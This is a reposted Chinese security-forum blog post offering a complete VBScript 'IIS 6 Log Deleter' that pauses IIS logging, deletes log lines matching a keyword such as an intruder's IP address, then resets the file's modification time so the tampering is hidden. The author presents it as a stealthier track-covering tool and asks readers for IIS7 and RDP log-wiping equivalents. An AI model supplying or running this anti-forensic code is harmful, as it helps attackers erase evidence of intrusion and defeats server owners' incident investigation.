IIS6 日志删除脚本(t00ls)

最新推荐文章于 2024-08-08 17:00:12 发布
最新推荐文章于 2024-08-08 17:00:12 发布
阅读量202 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/Le30bjectNs11/p/4105790.html
版权

发个很早前自己写的iis6的删除日志的vbs脚本
写这个东西的原因是网上的删除iis日志工具要么报毒(懒得做免杀),要么太暴力(直接关掉IIS服务再将日志文件整个删除,坑爹呢!?) 
后来找了下资料发现其实要删除iis6的日志没必要把iis服务停掉,只需要把日志记录的选项关掉就行了
在参考了Adsutil.vbs里面的部分代码后写了个vbs,专门用来删除iis6的日志,不用停掉iis的服务,删除时使用正则表达式匹配关键字,而且删除后再将日志文件修改时间改回原来的时间



第一条列出当前IIS上面站点的详细信息:站点ID号,站点物理路径,站点的日志路径
第二条命令和第三条命令是暂停和开启指定站点的日志记录的,一般用不到。第四条命令里面已经包含这两条命令
第四条是指定站点ID号,要删除的日志文件绝对路径,要删除的日志的关键字(这里关键字使用正则表达式匹配)
一般使用第一条和第四条命令结合即可


要删除IP地址是172.16.1.5在12年12月12号的访问记录:



具体代码如下:

001If WScript.Arguments.Count < 1 Then
002        Usage()
003        WScript.Quit(1)
004End If
005 
006Select Case UCase(WScript.Arguments.Item(0))
007        Case "LIST"
008                Call ListWeb()
009        Case "STOPLOG"
010                Call SetLog(WScript.Arguments.Item(1),0) '0 stop log
011        Case "STARTLOG"
012                Call SetLog(WScript.Arguments.Item(1),1) '1 start log
013        Case "DELLOG"
014                Call DelLog(WScript.Arguments.Item(1),WScript.Arguments.Item(2),WScript.Arguments.Item(3))
015        Case Else
016                Call Usage()
017End Select
018 
019Sub Usage()
020        WScript.Echo "IIS 6 Log Deleter   By. Twi1ight" & vbCrLf
021        WScript.Echo "Usage:" & vbTab & _
022                WScript.ScriptName & " LIST" & vbCrLf & vbTab & _
023                WScript.ScriptName & " STARTLOG SiteID" & vbCrLf & vbTab & _
024                WScript.ScriptName & " STOPLOG  SiteID" & vbCrLf & vbTab & _
025                WScript.ScriptName & " DELLOG   SiteID  LogFile  KeyString" & vbCrLf & "  " & _
026                "LIST" & vbTab & vbTab & "List all websites info" & vbCrLf & "  " & _
027                "STARTLOG" & vbTab & "Start IIS Logging on SiteID" & vbCrLf & "  " & _
028                "STOPLOG" & vbTab & "Stop IIS Logging on SiteID" & vbCrLf & "  " & _
029                "DELLOG" & vbTab & "Automatical stop/start IIS log and delete log items which contains KeyString, KeyString is a Regular String"
030 
031End Sub
032 
033Sub CheckID(ID)
034        If Not IsNumeric(ID) Then
035                WScript.Echo "[-] The site ID specified is not Numeric"
036                WScript.Quit(1)
037        End If
038End Sub
039 
040Sub ListWeb()
041        Set ObjService=GetObject("IIS://LocalHost/W3SVC")
042        For Each obj3w In objservice
043                If IsNumeric(obj3w.Name) Then
044                        sServerName=Obj3w.ServerComment
045                        Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
046                        ListAllWeb = ListAllWeb & obj3w.Name & _
047                                                String(Abs(25-Len(obj3w.Name))," ") & _
048                                                obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
049                        Set objLog = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name)
050                        ListAllWeb = ListAllWeb & String(25," ") & _
051                                                "Log: " & objLog.LogFileDirectory & "\W3SVC" & obj3w.Name &vbCrLf
052                End If
053        Next
054        WScript.Echo ListAllWeb
055        Set ObjService=Nothing
056End Sub
057 
058Sub SetLog(ID, value)
059        CheckID(ID)
060        str = "Start"
061        If value = 0 Then
062                str = "Stop"
063        End If
064        Set objSite = GetObject("IIS://localhost/W3SVC/" & ID)
065        objSite.Put "LogType",value
066        objSite.SetInfo
067    If (Err.Number <> 0) Then
068                Err.Clear
069        WScript.Echo "[-] Error Trying To " & str & " IIS Logging!"
070        Else
071                WScript.Echo str & " IIS Logging Success!"
072    End If
073     
074End Sub
075 
076Sub DelLog(ID, LogFile, KeyString)
077        On Error Resume Next
078        Const ForReading = 1, ForWriting = 2, ForAppending = 8
079        'WScript.Echo "Delete Log File"
080        'Stop Log
081        Call SetLog(ID, 0)
082        WScript.Sleep 500 'wait iis to stop log otherwise will raise an exception if rewrite logfile immediately
083        Set regEx = New RegExp
084        regEx.Pattern = KeyString
085        regEx.IgnoreCase = True
086         
087        Set fso = CreateObject("Scripting.FileSystemObject")
088        'Save Last Modify Time
089        Set f = fso.GetFile(LogFile)
090        modifyDate = f.DateLastModified
091        'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified
092         
093        LogPath = fso.GetParentFolderName(LogFile)
094        LogName = fso.GetFileName(LogFile)
095        TempFile = fso.GetTempName
096        SrcFile = LogPath & "\" & TempFile
097 
098        'WScript.Echo TempFile
099        Call fso.CopyFile(LogFile, SrcFile)
100        Set srcLog = fso.OpenTextFile(SrcFile, ForReading, False)
101        Set dstLog = fso.OpenTextFile(LogFile, ForWriting, False)
102        Do While srcLog.AtEndOfLine <> True
103                line = srcLog.ReadLine
104                Set Martches = regEx.Execute(line)
105                If Martches.Count <> 0 Then
106                        WScript.Echo " "& line 'comment out this line if don't like to display deleted log item
107                Else
108                        dstLog.WriteLine(line)
109                End If
110        Loop
111        srcLog.Close
112        dstLog.Close
113        fso.DeleteFile(SrcFile)
114        'Change Last Modify Time
115        Set objShell = CreateObject("Shell.Application")
116        Set objFolder = objShell.NameSpace(LogPath)
117        Set objFolderItem = objFolder.ParseName(LogName)
118        objFolderItem.ModifyDate = modifyDate
119        'WScript.Echo f.DateCreated & " " & f.DateLastAccessed & " " & f.DateLastModified
120    If (Err.Number <> 0) Then
121                WScript.Echo "[-] Error Trying To Delete IIS Log!"
122                Err.Clear
123    End If
124        'Start Log
125        Call SetLog(ID, 1)
126End Sub

这个脚本只能用于IIS6,IIS7由于重新设计过,所以完全不同了,这里也求大牛公布怎么删除iis7的日志
还有我听说3389日志可以单条删除,不知有哪位基友有此神器么?

转载于:https://www.cnblogs.com/Le30bjectNs11/p/4105790.html

Jiajia2017
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手动清除IIS日志
09-06
 了解IIS日志文件清除的基本原理。  手动清除本机上的IIS日志。  掌握针对日志清除攻击的防御方法。
IIS日志删除脚本
weixin_33806509的博客
11-26 216
How can I delete all files from my IIS log file directory that are over 90 days old?这个脚本可以从日志目录中删除90天的记录。Option Explicit Const GENERAL_FAILURE = 2 Const KillFile=0 ' Set this to...
自动清理 IIS 日志脚本
weixin_33958366的博客
08-11 129
转载自:http://www.coolcode.cn 原来的虚拟主机服务器一直用 awstats 对 IIS日志分析统计,我把它设成每天晚上进行一次分析,统计前一天的日志文件,分析过的日志文件一般也就没有什么大用处了。但是 IIS 的每个站点每天都有一个日志文件生成,小的几百 K,大的则有几百 M,如果不定期及时清理的话,系统盘很快就被塞满了,因此我写了一个清理 IIS 日志脚本,添加...
清理 iis 日志
恒信的博客
02-21 1718
一,新建一个文档,重新命名为iisclear.bat 二,编辑文档,输入一下内容 :: 清理IIS日志文件 :: 备份MySql数据库 @echo off title 清理IIS日志文件   :: IIS日志文件目录 set log_dir="C:\inetpub\logs\LogFiles"   :: 保留日志天数 set bak_dat=15 :: 删除日志文件 forfiles /p ...
删除IIs日志脚本
03-25 399
path 目录ext 文件扩展名expiredDays 保留多少天以内的文件Sub LogCleaner(path,ext,expiredDays) On Error Resume Next Set oFso = CreateObject("Scripting.FileSystemObject")
Python 实现 T00ls 自动签到脚本代码(邮件+钉钉通知)
04-24
于是在 T00ls 论坛搜索了一下,发现有不少大佬都写了自己的签到脚本,签到功能实现、定时任务执行以及签到提醒的方式多种多样,好羡慕啊。所以这里国光也尝试借鉴前辈们的脚本,尝试整合一个自己的自动签到脚本,...
T00ls技术文章350篇
02-19
T00ls技术文章350篇
T00LS Metasploit(第一季).zip
03-11
《Metasploit实战指南——T00LS第一季》 Metasploit,作为全球最知名的开源安全渗透测试框架,是网络安全专业人士不可或缺的工具之一。它主要用于模拟攻击,帮助安全专家评估系统漏洞,验证网络防御的有效性。T00LS...
IIS日志自动清理
飞鸟的博客
11-12 5169
IIS在运行的过程中日志会不停地增长,若iis的网站被频繁的调用或不当的调用,则会产生很多日志。对于系统盘或者磁盘空间不够的服务器来说。IIS日志自动清理则非常有必要。 脚本如下: 1,文件名:rmiislog.js 脚本内容: function dellogfile(beforedays) {     var fso = new Act
IIS日志清理(CMD版,VBS版,JS版,WSH版)
01-10
应用场合:主要用与虚拟主机,也可用于个人服务器 产生背景:2005 年某月某日,一向运行正常的虚拟主机死机了,让机房值班人员重启数次,都不成,接显示器进系统看,提示:C盘空间不足,半夜还得去机房处理,到机房后先断网,再进系统发现有两个地方有问题,C:\WINDOWS\system32\LogFiles文件有6G,还有一个就是Symantec隔离病毒的地方,到网上找了下,最大可能性是我们的虚拟主机的所有日志都写在这里,并且没人知道写在这里,郁闷,在IIS里看了下,还真是这么回事,日志天天都在长,当时公司订单很多也没人关注这个,当时清理了一下,系统正常,回到公司后把IIS日志改到别的盘了。 解决方
最简单的IIS日志自动清理的方法设置
04-05
最简单的IIS日志自动清理的方法设置 绝对最方便
vb 生成日志文件方法代码_清除IIS日志文件的方法技巧
weixin_39571087的博客
12-11 424
IIS在运行的过程中日志会不停地增长,若IIS的网站被频繁的调用或不当的调用,则会产生很多日志,我在系统运维的时候曾出现过20G的系统盘,由于合作商开发的程序有问题,每几百微秒调用一次web服务,短期内导致日志膨胀至8~9G,对于系统盘或者磁盘空间不够的服务器来说,IIS日志自动清理则非常有必要。很多使用Windows IIS的站长可能都会遇到这个问题,就是服务器的IIS日志增长经常会导...
IIS日志清理专题,CMD版,VBS版,JS版,WSH版
柳永法的个人博客
12-02 999
完整无错版请点击:IIS日志清理专题,CMD版,VBS版,JS版,WSH版专题名称:IIS日志清理专题,CMD版,VBS版,JS版,WSH版关键词:IIS日志清理,日志清理,IIS日志清理CMD版,IIS日志清理VBS版,IIS日志清理JS版,IIS日志清理WSH版应用场合:主要用与虚拟主机,也可用于个人服务器产生背景:2005年某月某日,一向运行正常的虚拟主机死机了,让机
日志清除(学习笔记)Day01:IIS日志清除(使用 AIO 与 CleanIISLog)
坚持硬核
12-08 1860
入侵者在攻击过程或者在被控制计算机上执行的一些操作"痕迹"都会或多或少留在系统中,例如通过SQL注入时,如果Web服务器设置了日志记录,则该日志记录文件将会记录入侵的IP地址、时间、操作等信息,通过这些信息可以进行追踪、判断以及还原攻击过程,是入侵者留下的入侵证据,在网络攻防中习惯称为消除痕迹,也有人称之为"擦屁屁"。AIO是ALLInOne的缩写,它是幻影的多种工具整合,拥有MT的功能,同时还有一些其它功能。AIO中的一个比较实用的功能是使用"AIO-CleanLog"命令来清除系统中的所有日志...
删除IIS过期日志--遍历文件夹,批量删除文件
weixin_42308355的博客
01-30 215
设定IIS日志目录为D:\LogFiles,for循环删除以u_ex12开头的log文件@echo offset dir=D:\LogFilesfor /f "delims=" %%i in ('dir /ad/b/s "%dir%"') do (del %%i\u_ex12*)pause
IIS 自动清理日志
学者-微风
08-10 1274
原文地址:IIS 自动清理日志 很多使用Windows IIS的站点可能都会遇到这个问题,就是服务器的IIS日志增长经常会导致磁盘空间被占满,而IIS也没有自动删除日志的功能,因此需要经常关注即时清理日志,因此我这里就介绍一个能够自动删除IIS日志的程序。 这个删除程序的功能很简单,每天自动删除N天前的日志(时间根据情况自己设置,一般设置为30天),可以使用DOS批处理脚本来实现。 ::Author: DennyHui ::Desc: AutoClearIISLogFiles ::2020年11月16日17
IIS日志自动删除程序
Enweitech Software Works
07-05 700
很多使用Windows IIS的站长可能都会遇到这个问题,就是服务器的IIS日志增长经常会导致磁盘空间被占满,而IIS也没有自动删除日志的功能,因此需要经常关注即时清理日志,因此我这里就介绍一个能够自动删除IIS日志的程序。   这个删除程序的功能很简单,每天自动删除N天前的日志(时间根据情况自己设置,一般设置为30天),可以使用DOS批处理或VBS脚本来实现。   在下边的解决方案里
win 2003 / IIS6 部署网站的时候,文件IO操作、删除项目文件, 会导致IIS重启,Session丢失问题...
weixin_30315435的博客
10-23 81
项目中经常需要打些日志(文件IO读写操作),已记录调试、错误等信息。比较方便的有log4net等开源项目。 问题描述: 最近用win 2003 /IIS6,部署了一个2.0 的网站,在操作文件的时候,经常页面卡、脚本加载慢,session 丢失等问题。但是在win 08 / IIS7 上正常。 解决方案: (1)<sessionState mode="StateServer"/&...
UnixBench分数计算与多进程测试
最新发布
qq_39280836的博客
08-08 157
在支持较好的测试机上直接运行RUN脚本即可得到测试结果。
wlozz t00ls
09-09
"wlozz t00ls" 是一个网站或者工具的名字,由于给出的信息太少,无法确定具体的含义和用途。不过,根据名字的字母排列和数字的使用,可能是一个面向技术领域或者计算机相关的工具。 在任何情况下,无法确认具体指代...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值